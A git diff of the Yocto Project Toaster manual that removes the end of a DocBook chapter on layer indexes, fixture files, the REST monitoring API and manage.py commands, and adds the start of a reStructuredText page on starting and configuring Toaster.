-        across the Web and the information in this manual by no means
-        attempts to provide a command comprehensive reference.
-    </para>
-
-    <section id='layer-source'>
-        <title>Layer Source</title>
-
-        <para>
-            In general, a "layer source" is a source of information about
-            existing layers.
-            In particular, we are concerned with layers that you can use
-            with the Yocto Project and Toaster.
-            This chapter describes a particular type of layer source called
-            a "layer index."
-        </para>
-
-        <para>
-            A layer index is a web application that contains information
-            about a set of custom layers.
-            A good example of an existing layer index is the
-            OpenEmbedded Layer Index.
-            A public instance of this layer index exists at
-            <ulink url='http://layers.openembedded.org'></ulink>.
-            You can find the code for this layer index's web application at
-            <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/layerindex-web/'></ulink>.
-        </para>
-
-        <para>
-            When you tie a layer source into Toaster, it can query the layer
-            source through a
-            <ulink url='http://en.wikipedia.org/wiki/Representational_state_transfer'>REST</ulink>
-            API, store the information about the layers in the Toaster
-            database, and then show the information to users.
-            Users are then able to view that information and build layers
-            from Toaster itself without worrying about cloning or editing
-            the BitBake layers configuration file
-            <filename>bblayers.conf</filename>.
-        </para>
-
-        <para>
-            Tying a layer source into Toaster is convenient when you have
-            many custom layers that need to be built on a regular basis by
-            a community of developers.
-            In fact, Toaster comes pre-configured with the OpenEmbedded
-            Metadata Index.
-            <note>
-                You do not have to use a layer source to use Toaster.
-                Tying into a layer source is optional.
-            </note>
-        </para>
-
-        <section id='layer-source-using-with-toaster'>
-            <title>Setting Up and Using a Layer Source</title>
-
-            <para>
-                To use your own layer source, you need to set up the layer
-                source and then tie it into Toaster.
-                This section describes how to tie into a layer index in a manner
-                similar to the way Toaster ties into the OpenEmbedded Metadata
-                Index.
-           </para>
-
-            <section id='understanding-your-layers'>
-                <title>Understanding Your Layers</title>
-
-                <para>
-                    The obvious first step for using a layer index is to have
-                    several custom layers that developers build and access using
-                    the Yocto Project on a regular basis.
-                    This set of layers needs to exist and you need to be
-                    familiar with where they reside.
-                    You will need that information when you set up the
-                    code for the web application that "hooks" into your set of
-                    layers.
-                </para>
-
-                <para>
-                    For general information on layers, see the
-                    "<ulink url='&YOCTO_DOCS_OM_URL;#the-yocto-project-layer-model'>The Yocto Project Layer Model</ulink>"
-                    section in the Yocto Project Overview and Concepts Manual.
-                    For information on how to create layers, see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#understanding-and-creating-layers'>Understanding and Creating Layers</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                </para>
-            </section>
-
-            <section id='configuring-toaster-to-hook-into-your-layer-source'>
-                <title>Configuring Toaster to Hook Into Your Layer Index</title>
-
-                <para>
-                    If you want Toaster to use your layer index, you must host
-                    the web application in a server to which Toaster can
-                    connect.
-                    You also need to give Toaster the information about your
-                    layer index.
-                    In other words, you have to configure Toaster to use your
-                    layer index.
-                    This section describes two methods by which you can
-                    configure and use your layer index.
-                </para>
-
-                <para>
-                    In the previous section, the code for the OpenEmbedded
-                    Metadata Index (i.e.
-                    <ulink url='http://layers.openembedded.org'></ulink>) was
-                    referenced.
-                    You can use this code, which is at
-                    <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/layerindex-web/'></ulink>,
-                    as a base to create your own layer index.
-                </para>
-
-                <section id='use-the-administration-interface'>
-                    <title>Use the Administration Interface</title>
-
-                    <para>
-                        Access the administration interface through a
-                        browser by entering the URL of your Toaster instance and
-                        adding "<filename>/admin</filename>" to the end of the
-                        URL.
-                        As an example, if you are running Toaster locally, use
-                        the following URL:
-                        <literallayout class='monospaced'>
-     http://127.0.0.1:8000/admin
-                        </literallayout>
-                    </para>
-
-                    <para>
-                        The administration interface has a "Layer sources"
-                        section that includes an "Add layer source" button.
-                        Click that button and provide the required information.
-                        Make sure you select "layerindex" as the layer source type.
-                    </para>
-                </section>
-
-                <section id='use-the-fixture-feature'>
-                    <title>Use the Fixture Feature</title>
-
-                    <para>
-                        The Django fixture feature overrides the default layer
-                        server when you use it to specify a custom URL. To use
-                        the fixture feature, create (or edit) the file
-                        <filename>bitbake/lib/toaster.orm/fixtures/custom.xml</filename>,
-                        and then set the following Toaster setting to your
-                        custom URL:
-                        <literallayout class='monospaced'>
-     &lt;?xml version="1.0" ?&gt;
-     &lt;django-objects version="1.0"&gt;
-       &lt;object model="orm.toastersetting" pk="100"&gt;
-                     &lt;field name="name" type="CharField"&gt;CUSTOM_LAYERINDEX_SERVER&lt;/field&gt;
-                     &lt;field name="value" type="CharField"&gt;https://layers.my_organization.org/layerindex/branch/master/layers/&lt;/field&gt;
-       &lt;/object&gt;
-     &lt;django-objects&gt;
-                        </literallayout>
-                        When you start Toaster for the first time, or if you
-                        delete the file <filename>toaster.sqlite</filename> and restart,
-                        the database will populate cleanly from this layer index server.
-                    </para>
-
-                    <para>
-                        Once the information has been updated, verify the new layer
-                        information is available by using the Toaster web interface.
-                        To do that, visit the "All compatible layers" page inside a
-                        Toaster project. The layers from your layer source should be
-                        listed there.
-                    </para>
-
-                    <para>
-                        If you change the information in your layer index server,
-                        refresh the Toaster database by running the following command:
-                        <literallayout class='monospaced'>
-     $ bitbake/lib/toaster/manage.py lsupdates
-                        </literallayout>
-                        If Toaster can reach the API URL, you should see a message
-                        telling you that Toaster is updating the layer source information.
-                    </para>
-                </section>
-            </section>
-        </section>
-    </section>
-
-    <section id='toaster-releases'>
-        <title>Releases</title>
-
-        <para>
-            When you create a Toaster project using the web interface,
-            you are asked to choose a "Release."
-            In the context of Toaster, the term "Release" refers to a set of
-            layers and a BitBake version the OpenEmbedded build system uses
-            to build something.
-            As shipped, Toaster is pre-configured with releases that
-            correspond to Yocto Project release branches.
-            However, you can modify, delete, and create new releases
-            according to your needs.
-            This section provides some background information on releases.
-        </para>
-
-        <section id='toaster-releases-supported'>
-            <title>Pre-Configured Releases</title>
-
-            <para>
-                As shipped, Toaster is configured to use a specific set of
-                releases.
-                Of course, you can always configure Toaster to use any
-                release.
-                For example, you might want your project to build against a
-                specific commit of any of the "out-of-the-box" releases.
-                Or, you might want your project to build against different
-                revisions of OpenEmbedded and BitBake.
-            </para>
-
-            <para>
-                As shipped, Toaster is configured to work with the following
-                releases:
-                <itemizedlist>
-                    <listitem><para><emphasis>
-                        Yocto Project &DISTRO; "&DISTRO_NAME;" or OpenEmbedded "&DISTRO_NAME;":</emphasis>
-                        This release causes your Toaster projects to build
-                        against the head of the &DISTRO_NAME_NO_CAP; branch at
-                        <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/log/?h=rocko'></ulink>
-                        or <ulink url='http://git.openembedded.org/openembedded-core/commit/?h=rocko'></ulink>.
-                        </para></listitem>
-                    <listitem><para><emphasis>Yocto Project "Master" or OpenEmbedded "Master":</emphasis>
-                        This release causes your Toaster Projects to
-                        build against the head of the master branch, which is
-                        where active development takes place, at
-                        <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/log/'></ulink>
-                        or
-                        <ulink url='http://git.openembedded.org/openembedded-core/log/'></ulink>.
-                        </para></listitem>
-                    <listitem><para><emphasis>Local Yocto Project or Local OpenEmbedded:</emphasis>
-                        This release causes your Toaster Projects to
-                        build against the head of the <filename>poky</filename>
-                        or <filename>openembedded-core</filename> clone you
-                        have local to the machine running Toaster.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-    </section>
-
-    <section id='configuring-toaster'>
-        <title>Configuring Toaster</title>
-
-        <para>
-            In order to use Toaster, you must configure the database with the
-            default content. The following subsections describe various aspects
-            of Toaster configuration.
-        </para>
-
-        <section id='configuring-the-workflow'>
-            <title>Configuring the Workflow</title>
-
-            <para>
-                The
-                <filename>bldcontrol/management/commands/checksettings.py</filename>
-                file controls workflow configuration.
-                The following steps outline the process to initially populate
-                this database.
-                <orderedlist>
-                    <listitem><para>
-                        The default project settings are set from
-                        <filename>orm/fixtures/settings.xml</filename>.
-                        </para></listitem>
-                    <listitem><para>
-                        The default project distro and layers are added
-                        from <filename>orm/fixtures/poky.xml</filename> if poky
-                        is installed.
-                        If poky is not installed, they are added
-                        from <filename>orm/fixtures/oe-core.xml</filename>.
-                        </para></listitem>
-                    <listitem><para>
-                        If the <filename>orm/fixtures/custom.xml</filename> file
-                        exists, then its values are added.
-                        </para></listitem>
-                    <listitem><para>
-                        The layer index is then scanned and added to the database.
-                        </para></listitem>
-                </orderedlist>
-                Once these steps complete, Toaster is set up and ready to use.
-            </para>
-        </section>
-
-        <section id='customizing-pre-set-data'>
-            <title>Customizing Pre-Set Data</title>
-
-            <para>
-                The pre-set data for Toaster is easily customizable. You can
-                create the <filename>orm/fixtures/custom.xml</filename> file
-                to customize the values that go into to the database.
-                Customization is additive,
-                and can either extend or completely replace the existing values.
-            </para>
-
-            <para>
-                You use the <filename>orm/fixtures/custom.xml</filename> file
-                to change the default project settings for the machine, distro,
-                file images, and layers.
-                When creating a new project, you can use the file to define
-                the offered alternate project release selections.
-                For example, you can add one or more additional selections that
-                present custom layer sets or distros, and any other local or proprietary
-                content.
-            </para>
-
-            <para>
-                Additionally, you can completely disable the content from the
-                <filename>oe-core.xml</filename> and <filename>poky.xml</filename>
-                files by defining the section shown below in the
-                <filename>settings.xml</filename> file.
-                For example, this option is particularly useful if your custom
-                configuration defines fewer releases or layers than the default
-                fixture files.
-            </para>
-
-            <para>
-                The following example sets "name" to "CUSTOM_XML_ONLY" and its value
-                to "True".
-                <literallayout class='monospaced'>
-     &lt;object model="orm.toastersetting" pk="99"&gt;
-       &lt;field type="CharField" name="name"&gt;CUSTOM_XML_ONLY&lt;/field&gt;
-       &lt;field type="CharField" name="value"&gt;True&lt;/field&gt;
-     &lt;/object&gt;
-                </literallayout>
-            </para>
-        </section>
-
-        <section id='understanding-fixture-file-format'>
-            <title>Understanding Fixture File Format</title>
-
-            <para>
-                The following is an overview of the file format used by the
-                <filename>oe-core.xml</filename>, <filename>poky.xml</filename>,
-                and <filename>custom.xml</filename> files.
-            </para>
-
-            <para>
-                The following subsections describe each of the sections in the
-                fixture files, and outline an example section of the XML code.
-                you can use to help understand this information and create a local
-                <filename>custom.xml</filename> file.
-            </para>
-
-            <section id='defining-the-default-distro-and-other-values'>
-                <title>Defining the Default Distro and Other Values</title>
-
-                <para>
-                    This section defines the default distro value for new projects.
-                    By default, it reserves the first Toaster Setting record "1".
-                    The following demonstrates how to set the project default value
-                    for
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO'><filename>DISTRO</filename></ulink>:
-                    <literallayout class='monospaced'>
-     &lt;!-- Set the project default value for DISTRO --&gt;
-     &lt;object model="orm.toastersetting" pk="1"&gt;
-       &lt;field type="CharField" name="name"&gt;DEFCONF_DISTRO&lt;/field&gt;
-       &lt;field type="CharField" name="value"&gt;poky&lt;/field&gt;
-     &lt;/object&gt;
-                    </literallayout>
-                       You can override other default project values by adding
-                       additional Toaster Setting sections such as any of the
-                       settings coming from the <filename>settings.xml</filename>
-                       file.
-                       Also, you can add custom values that are included in the
-                       BitBake environment.
-                       The "pk" values must be unique.
-                       By convention, values that set default project values have a
-                       "DEFCONF" prefix.
-                </para>
-            </section>
-
-            <section id='defining-bitbake-version'>
-                <title>Defining BitBake Version</title>
-
-                <para>
-                    The following defines which version of BitBake is used
-                    for the following release selection:
-                    <literallayout class='monospaced'>
-     &lt;!-- Bitbake versions which correspond to the metadata release --&gt;
-     &lt;object model="orm.bitbakeversion" pk="1"&gt;
-       &lt;field type="CharField" name="name"&gt;rocko&lt;/field&gt;
-       &lt;field type="CharField" name="giturl"&gt;git://git.yoctoproject.org/poky&lt;/field&gt;
-       &lt;field type="CharField" name="branch"&gt;rocko&lt;/field&gt;
-       &lt;field type="CharField" name="dirpath"&gt;bitbake&lt;/field&gt;
-     &lt;/object&gt;
-                    </literallayout>
-                </para>
-            </section>
-
-            <section id='defining-releases'>
-                <title>Defining Release</title>
-
-                <para>
-                    The following defines the releases when you create a new
-                    project.
-                    <literallayout class='monospaced'>
-     &lt;!-- Releases available --&gt;
-     &lt;object model="orm.release" pk="1"&gt;
-       &lt;field type="CharField" name="name"&gt;rocko&lt;/field&gt;
-       &lt;field type="CharField" name="description"&gt;Yocto Project 2.4 "Rocko"&lt;/field&gt;
-       &lt;field rel="ManyToOneRel" to="orm.bitbakeversion" name="bitbake_version"&gt;1&lt;/field&gt;
-       &lt;field type="CharField" name="branch_name"&gt;rocko&lt;/field&gt;
-       &lt;field type="TextField" name="helptext"&gt;Toaster will run your builds using the tip of the &lt;a href="http://git.yoctoproject.org/cgit/cgit.cgi/poky/log/?h=rocko"&gt;Yocto Project Rocko branch&lt;/a&gt;.&lt;/field&gt;
-     &lt;/object&gt;
-                    </literallayout>
-                    The "pk" value must match the above respective BitBake
-                    version record.
-                </para>
-            </section>
-
-            <section id='defining-the-release-default-layer-names'>
-                <title>Defining the Release Default Layer Names</title>
-
-                <para>
-                    The following defines the default layers for each release:
-                    <literallayout class='monospaced'>
-     &lt;!-- Default project layers for each release --&gt;
-     &lt;object model="orm.releasedefaultlayer" pk="1"&gt;
-       &lt;field rel="ManyToOneRel" to="orm.release" name="release"&gt;1&lt;/field&gt;
-       &lt;field type="CharField" name="layer_name"&gt;openembedded-core&lt;/field&gt;
-     &lt;/object&gt;
-                    </literallayout>
-                    The 'pk' values in the example above should start at "1" and increment
-                    uniquely.
-                    You can use the same layer name in multiple releases.
-                </para>
-            </section>
-
-            <section id='defining-layer-definitions'>
-                <title>Defining Layer Definitions</title>
-
-                <para>
-                    Layer definitions are the most complex.
-                    The following defines each of the layers, and then defines the exact layer
-                    version of the layer used for each respective release.
-                    You must have one <filename>orm.layer</filename>
-                    entry for each layer.
-                    Then, with each entry you need a set of
-                    <filename>orm.layer_version</filename> entries that connects
-                    the layer with each release that includes the layer.
-                    In general all releases include the layer.
-                    <literallayout class='monospaced'>
-     &lt;object model="orm.layer" pk="1"&gt;
-       &lt;field type="CharField" name="name"&gt;openembedded-core&lt;/field&gt;
-       &lt;field type="CharField" name="layer_index_url"&gt;&lt;/field&gt;
-       &lt;field type="CharField" name="vcs_url"&gt;git://git.yoctoproject.org/poky&lt;/field&gt;
-       &lt;field type="CharField" name="vcs_web_url"&gt;http://git.yoctoproject.org/cgit/cgit.cgi/poky&lt;/field&gt;
-       &lt;field type="CharField" name="vcs_web_tree_base_url"&gt;http://git.yoctoproject.org/cgit/cgit.cgi/poky/tree/%path%?h=%branch%&lt;/field&gt;
-       &lt;field type="CharField" name="vcs_web_file_base_url"&gt;http://git.yoctoproject.org/cgit/cgit.cgi/poky/tree/%path%?h=%branch%&lt;/field&gt;
-     &lt;/object&gt;
-     &lt;object model="orm.layer_version" pk="1"&gt;
-       &lt;field rel="ManyToOneRel" to="orm.layer" name="layer"&gt;1&lt;/field&gt;
-       &lt;field type="IntegerField" name="layer_source"&gt;0&lt;/field&gt;
-       &lt;field rel="ManyToOneRel" to="orm.release" name="release"&gt;1&lt;/field&gt;
-       &lt;field type="CharField" name="branch"&gt;rocko&lt;/field&gt;
-       &lt;field type="CharField" name="dirpath"&gt;meta&lt;/field&gt;
-     &lt;/object&gt;
-     &lt;object model="orm.layer_version" pk="2"&gt;
-       &lt;field rel="ManyToOneRel" to="orm.layer" name="layer"&gt;1&lt;/field&gt;
-       &lt;field type="IntegerField" name="layer_source"&gt;0&lt;/field&gt;
-       &lt;field rel="ManyToOneRel" to="orm.release" name="release"&gt;2&lt;/field&gt;
-       &lt;field type="CharField" name="branch"&gt;HEAD&lt;/field&gt;
-       &lt;field type="CharField" name="commit"&gt;HEAD&lt;/field&gt;
-       &lt;field type="CharField" name="dirpath"&gt;meta&lt;/field&gt;
-     &lt;/object&gt;
-     &lt;object model="orm.layer_version" pk="3"&gt;
-       &lt;field rel="ManyToOneRel" to="orm.layer" name="layer"&gt;1&lt;/field&gt;
-       &lt;field type="IntegerField" name="layer_source"&gt;0&lt;/field&gt;
-       &lt;field rel="ManyToOneRel" to="orm.release" name="release"&gt;3&lt;/field&gt;
-
-       &lt;field type="CharField" name="branch"&gt;master&lt;/field&gt;
-       &lt;field type="CharField" name="dirpath"&gt;meta&lt;/field&gt;
-     &lt;/object&gt;
-                    </literallayout>
-                    The layer "pk" values above must be unique, and typically start at "1".
-                    The layer version "pk" values must also be unique across all layers,
-                    and typically start at "1".
-                </para>
-            </section>
-        </section>
-    </section>
-
-    <section id='remote-toaster-monitoring'>
-        <title>Remote Toaster Monitoring</title>
-
-        <para>
-            Toaster has an API that allows remote management applications to
-            directly query the state of the Toaster server and its builds
-            in a machine-to-machine manner.
-            This API uses the
-            <ulink url='http://en.wikipedia.org/wiki/Representational_state_transfer'>REST</ulink>
-            interface and the transfer of JSON files.
-            For example, you might
-            monitor a build inside a container through well supported
-            known HTTP ports in order to easily access a Toaster server
-            inside the container.
-            In this example, when you use this direct JSON API, you avoid
-            having web page parsing against the display the user sees.
-        </para>
-
-        <section id='checking-health'>
-            <title>Checking Health</title>
-
-            <para>
-                Before you use remote Toaster monitoring, you should do
-                a health check.
-                To do this, ping the Toaster server using the following call
-                to see if it is still alive:
-                <literallayout class='monospaced'>
-     http://<replaceable>host</replaceable>:<replaceable>port</replaceable>/health
-                </literallayout>
-                Be sure to provide values for <replaceable>host</replaceable>
-                and <replaceable>port</replaceable>.
-                If the server is alive, you will get the response HTML:
-                <literallayout class='monospaced'>
-     &lt;!DOCTYPE html&gt;
-     &lt;html lang="en"&gt;
-       &lt;head&gt;&lt;title&gt;Toaster Health&lt;/title&gt;&lt;/head&gt;
-       &lt;body&gt;Ok&lt;/body&gt;
-     &lt;/html&gt;
-                </literallayout>
-            </para>
-        </section>
-
-        <section id='determining-status-of-builds-in-progress'>
-            <title>Determining Status of Builds in Progress</title>
-
-            <para>
-                Sometimes it is useful to determine the status of a build
-                in progress.
-                To get the status of pending builds, use the following call:
-                <literallayout class='monospaced'>
-     http://<replaceable>host</replaceable>:<replaceable>port</replaceable>/toastergui/api/building
-                </literallayout>
-                Be sure to provide values for <replaceable>host</replaceable>
-                and <replaceable>port</replaceable>.
-                The output is a JSON file that itemizes all builds in
-                progress.
-                This file includes the time in seconds since each
-                respective build started as well as the progress of the
-                cloning, parsing, and task execution.
-                The following is sample output for a build in progress:
-                <literallayout class='monospaced'>
-     {"count": 1,
-      "building": [
-        {"machine": "beaglebone",
-           "seconds": "463.869",
-           "task": "927:2384",
-           "distro": "poky",
-           "clone": "1:1",
-           "id": 2,
-           "start": "2017-09-22T09:31:44.887Z",
-           "name": "20170922093200",
-           "parse": "818:818",
-           "project": "my_rocko",
-           "target": "core-image-minimal"
-           }]
-     }
-                </literallayout>
-                The JSON data for this query is returned in a single line.
-                In the previous example the line has been artificially split for readability.
-            </para>
-        </section>
-
-        <section id='checking-status-of-builds-completed'>
-            <title>Checking Status of Builds Completed</title>
-
-            <para>
-                Once a build is completed, you get the status when you use
-                the following call:
-                <literallayout class='monospaced'>
-     http://<replaceable>host</replaceable>:<replaceable>port</replaceable>/toastergui/api/builds
-                </literallayout>
-                Be sure to provide values for <replaceable>host</replaceable>
-                and <replaceable>port</replaceable>.
-                The output is a JSON file that itemizes all complete builds,
-                and includes build summary information.
-                The following is sample output for a completed build:
-                <literallayout class='monospaced'>
-     {"count": 1,
-      "builds": [
-        {"distro": "poky",
-           "errors": 0,
-           "machine":
-           "beaglebone",
-           "project": "my_rocko",
-           "stop": "2017-09-22T09:26:36.017Z",
-           "target": "quilt-native",
-           "seconds": "78.193",
-           "outcome": "Succeeded",
-           "id": 1,
-           "start": "2017-09-22T09:25:17.824Z",
-           "warnings": 1,
-           "name": "20170922092618"
-           }]
-     }
-                </literallayout>
-                The JSON data for this query is returned in a single line.
-                In the previous example the line has been artificially split for readability.
-            </para>
-        </section>
-
-        <section id='determining-status-of-a-specific-build'>
-            <title>Determining Status of a Specific Build</title>
-
-            <para>
-                Sometimes it is useful to determine the status of a specific
-                build.
-                To get the status of a specific build, use the following
-                call:
-                <literallayout class='monospaced'>
-     http://<replaceable>host</replaceable>:<replaceable>port</replaceable>/toastergui/api/build/<replaceable>ID</replaceable>
-                </literallayout>
-                Be sure to provide values for <replaceable>host</replaceable>,
-                <replaceable>port</replaceable>, and <replaceable>ID</replaceable>.
-                You can find the value for <replaceable>ID</replaceable> from the
-                Builds Completed query. See the
-                "<link linkend='checking-status-of-builds-completed'>Checking Status of Builds Completed</link>"
-                section for more information.
-            </para>
-
-            <para>
-                The output is a JSON file that itemizes the specific build
-                and includes build summary information.
-                The following is sample output for a specific build:
-                <literallayout class='monospaced'>
-     {"build":
-       {"distro": "poky",
-        "errors": 0,
-        "machine": "beaglebone",
-        "project": "my_rocko",
-        "stop": "2017-09-22T09:26:36.017Z",
-        "target": "quilt-native",
-        "seconds": "78.193",
-        "outcome": "Succeeded",
-        "id": 1,
-        "start": "2017-09-22T09:25:17.824Z",
-        "warnings": 1,
-        "name": "20170922092618",
-        "cooker_log": "/opt/user/poky/build-toaster-2/tmp/log/cooker/beaglebone/build_20170922_022607.991.log"
-        }
-     }
-                </literallayout>
-                The JSON data for this query is returned in a single line.
-                In the previous example the line has been artificially split for readability.
-            </para>
-        </section>
-    </section>
-
-    <section id='toaster-useful-commands'>
-        <title>Useful Commands</title>
-
-        <para>
-            In addition to the web user interface and the scripts that start
-            and stop Toaster, command-line commands exist through the
-            <filename>manage.py</filename> management script.
-            You can find general documentation on
-            <filename>manage.py</filename> at the
-            <ulink url='https://docs.djangoproject.com/en/1.7/topics/settings/'>Django</ulink>
-            site.
-            However, several <filename>manage.py</filename> commands have been
-            created that are specific to Toaster and are used to control
-            configuration and back-end tasks.
-            You can locate these commands in the
-            <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
-            (e.g. <filename>poky</filename>) at
-            <filename>bitbake/lib/manage.py</filename>.
-            This section documents those commands.
-            <note><title>Notes</title>
-                <itemizedlist>
-                    <listitem><para>
-                        When using <filename>manage.py</filename> commands given
-                        a default configuration, you must be sure that your
-                        working directory is set to the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
-                        Using <filename>manage.py</filename> commands from the
-                        Build Directory allows Toaster to find the
-                        <filename>toaster.sqlite</filename> file, which is located
-                        in the Build Directory.
-                        </para></listitem>
-                    <listitem><para>
-                        For non-default database configurations, it is possible
-                        that you can use <filename>manage.py</filename> commands
-                        from a directory other than the Build Directory.
-                        To do so, the
-                        <filename>toastermain/settings.py</filename> file must be
-                        configured to point to the correct database backend.
-                        </para></listitem>
-                </itemizedlist>
-            </note>
-        </para>
-
-        <section id='toaster-command-buildslist'>
-            <title><filename>buildslist</filename></title>
-
-            <para>
-                The <filename>buildslist</filename> command lists all builds
-                that Toaster has recorded.
-                Access the command as follows:
-                <literallayout class='monospaced'>
-     $ bitbake/lib/toaster/manage.py buildslist
-                </literallayout>
-                The command returns a list, which includes numeric
-                identifications, of the builds that Toaster has recorded in the
-                current database.
-            </para>
-
-            <para>
-                You need to run the <filename>buildslist</filename> command
-                first to identify existing builds in the database before
-                using the
-                <link linkend='toaster-command-builddelete'><filename>builddelete</filename></link>
-                command.
-                Here is an example that assumes default repository and build
-                directory names:
-                <literallayout class='monospaced'>
-     $ cd ~/poky/build
-     $ python ../bitbake/lib/toaster/manage.py buildslist
-                </literallayout>
-                If your Toaster database had only one build, the above
-                <filename>buildslist</filename> command would return something
-                like the following:
-                <literallayout class='monospaced'>
-     1: qemux86 poky core-image-minimal
-                </literallayout>
-            </para>
-        </section>
-
-        <section id='toaster-command-builddelete'>
-            <title><filename>builddelete</filename></title>
-
-            <para>
-                The <filename>builddelete</filename> command deletes data
-                associated with a build.
-                Access the command as follows:
-                <literallayout class='monospaced'>
-     $ bitbake/lib/toaster/manage.py builddelete <replaceable>build_id</replaceable>
-                </literallayout>
-                The command deletes all the build data for the specified
-                <replaceable>build_id</replaceable>.
-                This command is useful for removing old and unused data from
-                the database.
-            </para>
-
-            <para>
-                Prior to running the <filename>builddelete</filename>
-                command, you need to get the ID associated with builds
-                by using the
-                <link linkend='toaster-command-buildslist'><filename>buildslist</filename></link>
-                command.
-            </para>
-        </section>
-
-        <section id='toaster-command-perf'>
-            <title><filename>perf</filename></title>
-
-            <para>
-                The <filename>perf</filename> command measures Toaster
-                performance.
-                Access the command as follows:
-                <literallayout class='monospaced'>
-     $ bitbake/lib/toaster/manage.py perf
-                </literallayout>
-                The command is a sanity check that returns page loading
-                times in order to identify performance problems.
-            </para>
-        </section>
-
-        <section id='toaster-command-checksettings'>
-            <title><filename>checksettings</filename></title>
-
-            <para>
-                The <filename>checksettings</filename> command verifies
-                existing Toaster settings.
-                Access the command as follows:
-                <literallayout class='monospaced'>
-     $ bitbake/lib/toaster/manage.py checksettings
-                </literallayout>
-                Toaster uses settings that are based on the
-                database to configure the building tasks.
-                The <filename>checksettings</filename> command verifies that
-                the database settings are valid in the sense that they have
-                the minimal information needed to start a build.
-            </para>
-
-            <para>
-                In order for the <filename>checksettings</filename> command
-                to work, the database must be correctly set up and not have
-                existing data.
-                To be sure the database is ready, you can run the following:
-                <literallayout class='monospaced'>
-     $ bitbake/lib/toaster/mana​ge.py syncdb
-     $ bitbake/lib/toaster/mana​ge.py migrate orm
-     $ bitbake/lib/toaster/mana​ge.py migrate bldcontrol
-                </literallayout>
-                After running these commands, you can run the
-                <filename>checksettings</filename> command.
-            </para>
-        </section>
-
-        <section id='toaster-command-runbuilds'>
-            <title><filename>runbuilds</filename></title>
-
-            <para>
-                The <filename>runbuilds</filename> command launches
-                scheduled builds.
-                Access the command as follows:
-                <literallayout class='monospaced'>
-     $ bitbake/lib/toaster/manage.py runbuilds
-                </literallayout>
-                The <filename>runbuilds</filename> command checks if
-                scheduled builds exist in the database and then launches them
-                per schedule.
-                The command returns after the builds start but before they
-                complete.
-                The Toaster Logging Interface records and updates the database
-                when the builds complete.
-            </para>
-        </section>
-    </section>
-</chapter>
diff --git a/documentation/toaster-manual/toaster-manual-setup-and-use.rst b/documentation/toaster-manual/toaster-manual-setup-and-use.rst
new file mode 100644
index 0000000000..97c5af6a0c
--- /dev/null
+++ b/documentation/toaster-manual/toaster-manual-setup-and-use.rst
@@ -0,0 +1,651 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+.. Set default pygment highlighting to 'shell' for this document
+.. highlight:: shell
+
+****************************
+Setting Up and Using Toaster
+****************************
+
+Starting Toaster for Local Development
+======================================
+
+Once you have set up the Yocto Project and installed the Toaster system
+dependencies as described in the ":ref:`toaster-manual/toaster-manual-start:Preparing to Use
+Toaster`" chapter, you are ready to start
+Toaster.
+
+Navigate to the root of your
+:term:`Source Directory` (e.g. ``poky``)::
+
+   $ cd poky
+
+Once in that directory, source the build environment script::
+
+   $ source oe-init-build-env
+
+Next, from the build directory (e.g.
+``poky/build``), start Toaster using this command::
+
+   $ source toaster start
+
+You can now run your builds from the command line, or with Toaster
+as explained in section
+":ref:`toaster-manual/toaster-manual-setup-and-use:using the toaster web interface`".
+
+To access the Toaster web interface, open your favorite browser and
+enter the following::
+
+   http://127.0.0.1:8000
+
+Setting a Different Port
+========================
+
+By default, Toaster starts on port 8000. You can use the ``WEBPORT``
+parameter to set a different port. For example, the following command
+sets the port to "8400"::
+
+   $ source toaster start webport=8400
+
+Setting Up Toaster Without a Web Server
+=======================================
+
+You can start a Toaster environment without starting its web server.
+This is useful for the following:
+
+-  Capturing a command-line build's statistics into the Toaster database
+   for examination later.
+
+-  Capturing a command-line build's statistics when the Toaster server
+   is already running.
+
+-  Having one instance of the Toaster web server track and capture
+   multiple command-line builds, where each build is started in its own
+   "noweb" Toaster environment.
+
+The following commands show how to start a Toaster environment without
+starting its web server, perform BitBake operations, and then shut down
+the Toaster environment. Once the build is complete, you can close the
+Toaster environment. Before closing the environment, however, you should
+allow a few minutes to ensure the complete transfer of its BitBake build
+statistics to the Toaster database. If you have a separate Toaster web
+server instance running, you can watch this command-line build's
+progress and examine the results as soon as they are posted::
+
+   $ source toaster start noweb
+   $ bitbake target
+   $ source toaster stop
+
+Setting Up Toaster Without a Build Server
+=========================================
+
+You can start a Toaster environment with the "New Projects" feature
+disabled. Doing so is useful for the following:
+
+-  Sharing your build results over the web server while blocking others
+   from starting builds on your host.
+
+-  Allowing only local command-line builds to be captured into the
+   Toaster database.
+
+Use the following command to set up Toaster without a build server::
+
+   $ source toaster start nobuild webport=port
+
+Setting up External Access
+==========================
+
+By default, Toaster binds to the loop back address (i.e. ``localhost``),
+which does not allow access from external hosts. To allow external
+access, use the ``WEBPORT`` parameter to open an address that connects
+to the network, specifically the IP address that your NIC uses to
+connect to the network. You can also bind to all IP addresses the
+computer supports by using the shortcut "0.0.0.0:port".
+
+The following example binds to all IP addresses on the host::
+
+   $ source toaster start webport=0.0.0.0:8400
+
+This example binds to a specific IP address on the host's NIC::
+
+   $ source toaster start webport=192.168.1.1:8400
+
+The Directory for Cloning Layers
+================================
+
+Toaster creates a ``_toaster_clones`` directory inside your Source
+Directory (i.e. ``poky``) to clone any layers needed for your builds.
+
+Alternatively, if you would like all of your Toaster related files and
+directories to be in a particular location other than the default, you
+can set the ``TOASTER_DIR`` environment variable, which takes precedence
+over your current working directory. Setting this environment variable
+causes Toaster to create and use ``$TOASTER_DIR./_toaster_clones``.
+
+.. _toaster-the-build-directory:
+
+The Build Directory
+===================
+
+Toaster creates a build directory within your Source Directory (e.g.
+``poky``) to execute the builds.
+
+Alternatively, if you would like all of your Toaster related files and
+directories to be in a particular location, you can set the
+``TOASTER_DIR`` environment variable, which takes precedence over your
+current working directory. Setting this environment variable causes
+Toaster to use ``$TOASTER_DIR/build`` as the build directory.
+
+.. _toaster-creating-a-django-super-user:
+
+Creating a Django Superuser
+===========================
+
+Toaster is built on the `Django
+framework <https://www.djangoproject.com/>`__. Django provides an
+administration interface you can use to edit Toaster configuration
+parameters.
+
